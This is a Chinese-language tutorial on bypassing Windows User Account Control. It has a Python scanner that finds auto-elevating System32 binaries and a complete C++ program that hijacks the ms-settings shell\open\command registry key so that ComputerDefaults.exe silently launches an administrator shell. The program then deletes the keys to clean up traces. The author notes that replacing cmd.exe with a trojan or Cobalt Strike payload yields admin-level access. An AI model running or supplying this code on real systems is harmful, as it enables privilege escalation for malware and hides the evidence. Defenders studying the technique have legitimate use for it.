UAC,全称为User Account Control(用户账户控制),是Windows Vista及后续版本中的一个安全组件。它的设计目的是防止潜在的破坏性操作——特别是那些可能对系统配置产生影响的操作——在不经过管理员授权的情况下执行。
UAC通过在执行可能需要管理员权限的任务时弹出提示窗口,要求用户确认操作或者输入管理员账户的密码,从而实现对可能的危险行为的监控和控制。这个特性使得恶意软件在未经用户许可的情况下更难以在系统中执行危险的操作,提高了系统的安全性
8
在Visual Studio中,你可以通过修改项目的manifest文件来配置User Account Control(用户账户控制,UAC)设置。这个文件是一个XML文件,它定义了应用程序的配置属性,其中一个属性就是UAC设置
asInvoker
:这是默认值。当这个值被设置时,应用程序会以启动它的用户的权限运行。如果应用程序被普通用户启动,它将会以普通权限运行;如果应用程序被管理员启动,它将以管理员权限运行。highestAvailable
:当这个值被设置时,应用程序会尽可能地获取最高权限。如果应用程序被管理员启动,它将会以管理员权限运行;如果应用程序被普通用户启动,它将以普通权限运行。requireAdministrator
:当这个值被设置时,应用程序总是以管理员权限运行。如果应用程序被普通用户启动,UAC会弹出一个对话框,要求用户输入管理员账户的密码
UAC(User Account Control)白名单挖掘是一种常见的权限提升技术,其基本思想是寻找可以在无UAC提示的情况下以管理员权限运行的应用程序。许多这样的程序会对其启动参数进行不够严格的检查,使得攻击者可以通过在启动参数中包含恶意代码,来使得这些程序在启动的同时执行这些恶意代码,从而实现权限提升
特别地,由于Windows中的许多设置应用程序(例如ComputerDefaults.exe
、fodhelper.exe
等)在设计时需要考虑到在UAC开启的情况下仍能正常工作,所以它们在manifest文件中常常会设置autoElevate
为true
,这意味着这些应用程序会在启动时自动提升至管理员权限,而且不会出现UAC提示
攻击者可能会尝试修改某些注册表键(例如HKCU\Software\Classes\ms-settings\Shell\Open\command
)来劫持这些协议处理程序,以使得当这些应用程序被启动时,他们指定的恶意代码也会被以管理员权限执行,从而实现权限提升。因此,这些键值是UAC白名单挖掘的常见目标
- Sigcheck工具是一个由Sysinternals提供的命令行实用程序,用于对Windows二进制文件(如.exe,.dll,.sys等)进行签名验证,并显示文件版本信息,证书链等。其下载地址: https://download.sysinternals.com/files/Sigcheck
- Process Monitor 是由 Windows Sysinternals 提供的一款高级监视工具,它可以实时监控 Windows 文件系统、注册表和进程/线程活动。其下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
我们正在寻找满足以下几个条件的白名单程序:
- 程序的 manifest 文件中的 autoElevate 属性必须配置为 true,这允许程序在无需用户干预的情况下自动获取提升的权限。
- 程序执行时不能弹出 UAC(用户账户控制)对话框,这确保了程序的无缝执行,不会因 UAC 对话框的出现而中断用户的工作流。
- 程序需要能够查询注册表中的
Shell\Open\command
键。这是因为shell\open\command
键值通常用于存储特定类型的可执行程序文件路径。当这种特定类型的程序运行时,系统会在注册表中查找并执行对应的shell\open\command
键值中指定的程序。这一属性允许我们通过改变该键值中的程序路径,将我们所需的程序插入到某些特定的系统操作中
使用sigcheck工具查看可执行程序的相关信息,如下图所示可以看到名为autoElevate
的标签,当其被设置为true时,它表示该应用程序在启动时会自动请求和获取管理员权限,前提是当前的用户账户有管理员权限
Sigcheck工具的-m选项用于显示二进制文件的描绘符。一个描绘符是一个可执行文件或DLL的XML文件,其中包含有关应用程序的信息。这些信息可以包括应用程序的名称,它的版本,它需要的特权等等
.\sigcheck64.exe -m C:\windows\system32\ComputerDefaults.exe
根据以上思路,我们可以使用以下python代码来筛选出可用的白名单程序。此脚本首先获取 C:\\Windows\\System32
目录及其子目录下所有 .exe
文件,然后对每个 .exe
文件检查其是否具有 autoElevate
属性,如果有则将文件名写入到 success.txt
文件中
import os
import subprocess
def get_exe_files(path):
exe_files = []
for root, dirs, files in os.walk(path):
for file in files:
if os.path.splitext(file)[1] == '.exe':
exe_files.append(os.path.join(root, file))
return exe_files
def check_auto_elevate(exe_files):
success_files = []
for file in exe_files:
command = r'.\sigcheck64.exe -m {} | findstr auto'.format(file)
try:
result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if '<autoElevate>true</autoElevate>' in result.stdout.decode('gb2312'):
print('[+] {}'.format(file))
success_files.append(file)
except Exception as e:
print('Error when processing file {}: {}'.format(file, str(e)))
return success_files
def main():
path = 'C:\\Windows\\System32'
print('Getting .exe files in {}...'.format(path))
exe_files = get_exe_files(path)
print('Checking auto elevate property for each file...')
success_files = check_auto_elevate(exe_files)
with open('WhiteList.txt', 'w') as f:
for file in success_files:
f.write('{}\n'.format(file))
print('Done. Found {} files with auto elevate property.'.format(len(success_files)))
if __name__ == '__main__':
main()
运行上述python代码后,会在其目录下生成一个WhiteList.txt文本文件,用于存放白名单程序的绝对路径,其文本内容如下:
C:\Windows\System32\bthudtask.exe
C:\Windows\System32\changepk.exe
C:\Windows\System32\ComputerDefaults.exe
C:\Windows\System32\dccw.exe
C:\Windows\System32\dcomcnfg.exe
C:\Windows\System32\DeviceEject.exe
C:\Windows\System32\DeviceProperties.exe
C:\Windows\System32\djoin.exe
C:\Windows\System32\easinvoker.exe
C:\Windows\System32\EASPolicyManagerBrokerHost.exe
C:\Windows\System32\eudcedit.exe
C:\Windows\System32\eventvwr.exe
C:\Windows\System32\fodhelper.exe
C:\Windows\System32\fsquirt.exe
C:\Windows\System32\FXSUNATD.exe
C:\Windows\System32\immersivetpmvscmgrsvr.exe
C:\Windows\System32\iscsicli.exe
C:\Windows\System32\iscsicpl.exe
C:\Windows\System32\lpksetup.exe
C:\Windows\System32\MSchedExe.exe
C:\Windows\System32\msconfig.exe
C:\Windows\System32\msra.exe
C:\Windows\System32\MultiDigiMon.exe
C:\Windows\System32\newdev.exe
C:\Windows\System32\odbcad32.exe
C:\Windows\System32\PasswordOnWakeSettingFlyout.exe
C:\Windows\System32\recdisc.exe
C:\Windows\System32\rrinstaller.exe
C:\Windows\System32\shrpubw.exe
C:\Windows\System32\slui.exe
C:\Windows\System32\SystemPropertiesAdvanced.exe
C:\Windows\System32\SystemPropertiesComputerName.exe
C:\Windows\System32\SystemPropertiesDataExecutionPrevention.exe
C:\Windows\System32\SystemPropertiesHardware.exe
C:\Windows\System32\SystemPropertiesPerformance.exe
C:\Windows\System32\SystemPropertiesProtection.exe
C:\Windows\System32\SystemPropertiesRemote.exe
C:\Windows\System32\SystemSettingsAdminFlows.exe
C:\Windows\System32\SystemSettingsRemoveDevice.exe
C:\Windows\System32\Taskmgr.exe
C:\Windows\System32\tcmsetup.exe
C:\Windows\System32\TpmInit.exe
C:\Windows\System32\WindowsUpdateElevatedInstaller.exe
C:\Windows\System32\WSReset.exe
C:\Windows\System32\wusa.exe
C:\Windows\System32\Sysprep\sysprep.exe
这里还需注意一点,有个别程序会弹出uac框的,例如changepk.exe,这个程序在windows11不会弹uac,但是在windows10会弹uac
打开ProcessMonitor捕捉ComputerDefaults.exe的运行信息,在Filter工具栏设置Process Name
为ComputerDefaults.exe
,Result
设置为NAME NOT FOUND
随后运行ComputerDeafaults,ProcessMonitor立马会显示关于此程序的相关信息
注意此路径HKCU\Software\Classes\ms-settings\Shell\Open\command
, 这行的操作是RegQueryKey
,表示查询注册表的一个键
在注册表中,键相当于目录,它们可以包含其他键(相当于子目录)或键值(相当于文件)。一个键通常不直接包含数据,数据是存储在键值中的
打开注册表,新建上述的键ms-settings\Shell\Open\command
再用ProcessMonitor捕捉ComputerDefaults的信息,发现它还会去查询DelegateExecute
键值,操作为RegQueryValue
,表示查询注册表的键值
在注册表中,键值是存储实际数据的地方,例如,可以在一个键值中存储一个字符串、一个数字或一个二进制数据
在注册表对应的键中添加个键值为DelegateExecute
,并将此目录的默认键值设为cmd.exe
Windows注册表中,每个键下面都有一个被称为“默认”或“(默认)”的键值。你可以将其视为该键的默认数据。当你访问一个键而不指定键值的名称时,将返回此默认键值的数据
再次运行ComputerDefaults,会弹出系统管理员权限的cmd,也就是说如果我们将cmd.exe替换成shellcode木马的路径,那么就能获得管理员权限的shell
由此我们可以总结,在执行ComputerDefaults.exe程序之前,系统会首先检查注册表路径HKCU:\Software\Classes\ms-settings\shell\open\command
是否存在。如果存在,系统将继续搜索同一目录下是否存在DelegateExecute键值对。
只有在这两个条件都满足的情况下,系统才会执行由HKCU:\Software\Classes\ms-settings\shell\open\command
路径所指向的exe文件
还有一点,为何要找HKCU(HKEY_CURRENT_USER)目录下的键值对呢?因为HKCU下的注册表键值不需要管理员权限。HKCU 包含当前登录用户配置信息,每个用户都有其自己的 HKCU,其中的设置可以被用户自由修改,通常不需要额外的管理员权限
在 HKEY_CURRENT_USER\Software\Classes
注册表路径下创建一个名为 ms-settings\shell\open\command
的新键(如果该键已存在则打开它)
// 创建或打开注册表键
if (RegCreateKeyEx(HKEY_CURRENT_USER, subKey, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) != ERROR_SUCCESS) {
std::cerr << "Unable to create or open registry key\n";
return false;
}
在刚刚创建的键下,创建一个名为 DelegateExecute
的键值,并将其设置为空字符串
// 添加 "DelegateExecute" 键值
if (RegSetValueEx(hKey, valueName, 0, REG_SZ, (const BYTE*)"", sizeof("")) != ERROR_SUCCESS) {
std::cerr << "Unable to set registry value\n";
RegCloseKey(hKey);
return false;
}
设置 ms-settings\shell\open\command
键的默认键值为 filename
变量,这里是 "cmd.exe"
// 设置默认键值为 "calc.exe"
if (RegSetValueEx(hKey, NULL, 0, REG_SZ, (const BYTE*)filename, strlen(filename) + 1) != ERROR_SUCCESS) {
std::cerr << "Unable to set default registry value\n";
RegCloseKey(hKey);
return false;
}
使用 CreateProcess
函数启动新的进程来执行 "C://windows//system32//cmd.exe"
这个命令,命令参数是 /c C://windows//system32//computerdefaults.exe
。当这个命令执行时,它实际上会通过 ms-settings\shell\open\command
注册表键执行 cmd.exe
,因为此键的默认键值被设置为 cmd.exe
。这个过程就是用户账户控制(UAC)的绕过
STARTUPINFO si; //进程启动信息
PROCESS_INFORMATION pi; //进程信息
ZeroMemory(&si, sizeof(si)); //将结构体si的所有成员都初始化为0
ZeroMemory(&pi, sizeof(pi)); //将结构体pi的所有成员都初始化为0
si.cb = sizeof(si); //结构体大小
if (!CreateProcess(
"C://windows//system32//cmd.exe", //要执行的应用程序名称(包含路径)
(LPSTR)"/c C://windows//system32//computerdefaults.exe", //命令行参数
NULL, //进程句柄不可被继承
NULL, //线程句柄不可被继承
FALSE, //不继承句柄
0, //标志位为0
NULL, //使用父进程的环境变量
NULL, //使用父进程的工作目录
&si, //传递启动信息
&pi) //传递进程信息
) {
printf("CreateProcess failed (%d).\n", GetLastError()); //打印错误信息
return 0;
}
//释放进程句柄和线程句柄
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
为了清理痕迹,程序等待一段时间后删除 HKEY_CURRENT_USER\Software\Classes\ms-settings
键,删除所有刚刚创建的键和键值
Sleep(1000);
//删除整个ms-settings目录
if (RegDeleteTree(HKEY_CURRENT_USER,"Software\\Classes\\ms-settings") != ERROR_SUCCESS)
{
printf("RegDeleteTree Error:%d", GetLastError());
return false;
}
system("pause");
// BypassUac.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
#include <iostream>
#include <Windows.h>
BOOL BypassUac(const char* filename) {
HKEY hKey;
const char* subKey = "Software\\Classes\\ms-settings\\shell\\open\\command";
const char* valueName = "DelegateExecute";
// 创建或打开注册表键
if (RegCreateKeyEx(HKEY_CURRENT_USER, subKey, 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) != ERROR_SUCCESS) {
std::cerr << "Unable to create or open registry key\n";
return false;
}
// 添加 "DelegateExecute" 键值
if (RegSetValueEx(hKey, valueName, 0, REG_SZ, (const BYTE*)"", sizeof("")) != ERROR_SUCCESS) {
std::cerr << "Unable to set registry value\n";
RegCloseKey(hKey);
return false;
}
// 设置默认键值为 "calc.exe"
if (RegSetValueEx(hKey, NULL, 0, REG_SZ, (const BYTE*)filename, strlen(filename) + 1) != ERROR_SUCCESS) {
std::cerr << "Unable to set default registry value\n";
RegCloseKey(hKey);
return false;
}
STARTUPINFO si; //进程启动信息
PROCESS_INFORMATION pi; //进程信息
ZeroMemory(&si, sizeof(si)); //将结构体si的所有成员都初始化为0
ZeroMemory(&pi, sizeof(pi)); //将结构体pi的所有成员都初始化为0
si.cb = sizeof(si); //结构体大小
if (!CreateProcess(
"C://windows//system32//cmd.exe", //要执行的应用程序名称(包含路径)
(LPSTR)"/c C://windows//system32//computerdefaults.exe", //命令行参数
NULL, //进程句柄不可被继承
NULL, //线程句柄不可被继承
FALSE, //不继承句柄
0, //标志位为0
NULL, //使用父进程的环境变量
NULL, //使用父进程的工作目录
&si, //传递启动信息
&pi) //传递进程信息
) {
printf("CreateProcess failed (%d).\n", GetLastError()); //打印错误信息
return 0;
}
//释放进程句柄和线程句柄
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
Sleep(1000);
//删除整个ms-settings目录
if (RegDeleteTree(HKEY_CURRENT_USER,"Software\\Classes\\ms-settings") != ERROR_SUCCESS)
{
printf("RegDeleteTree Error:%d", GetLastError());
return false;
}
system("pause");
}
int main()
{
const char* filename = "cmd.exe";
BypassUac(filename);
}
执行程序后返回一个管理员权限的cmd
如果我们将cmd.exe替换成cs木马的地址,那么cs就会以管理员权限上线